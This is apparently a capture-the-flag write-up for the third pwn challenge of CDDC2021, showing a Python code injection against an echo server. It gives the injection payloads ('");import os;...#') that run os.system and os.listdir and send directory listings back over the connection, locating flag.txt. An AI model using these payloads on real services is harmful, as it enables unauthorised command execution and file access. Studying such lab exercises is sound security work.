Python code injection attack on an echo server. Third pwn challenge in CDDC2021.
Your last mission, for now, looks promising. It’s some kind of an echo server. I think you can exploit it easily.
Target: 220.127.116.11 port 60230
For challenges like these, I like to spam weird characters. Luckily my first one gave me syntax error:
This tells me that they are not escaping my quote but is using it to terminate the string, hence having an unclosed quote at the back. Something like this:
I took a brave guess that it is Python because of the syntax error message. So I tried to list the current directory and echo it back.
input> ");import os;print(os.system("ls"))# Program output:
Note: this effectively does something like this (for what I had in mind at this point in time)
So our payload needs to be in the form of
Hmmm, that means that it doesn’t use
input> ", end="asdf");# Error: sendBack() expects 1 argument, 2 received
Sounds like some websocket is being used. So I just need to find out the variables it has and I can leak the current directory, and get the flag.
input> "+'|'.join(dir()))# Program output: conn|functionPointer|ram|userData|userDataPointer
dir() returns all variables available in the current scope, which is perfect.
conn should be the websocket connection. So I can do something like this:
input> ");import os;conn.send('\n'.join(os.listdir(os.getcwd())));# Program output: lib64 opt tmp usr home run libx32 proc srv var dev media boot lib root etc sbin bin mnt lib32 sys .dockerenv
Changing the directory for a bit:
input> ");import os;conn.send(' '.join(os.listdir(os.getcwd() + 'root')));# Program output: .bashrc .profile buffer_overflow.py exploit.sh memory flag.txt
Wait what? Buffer overflow???? XD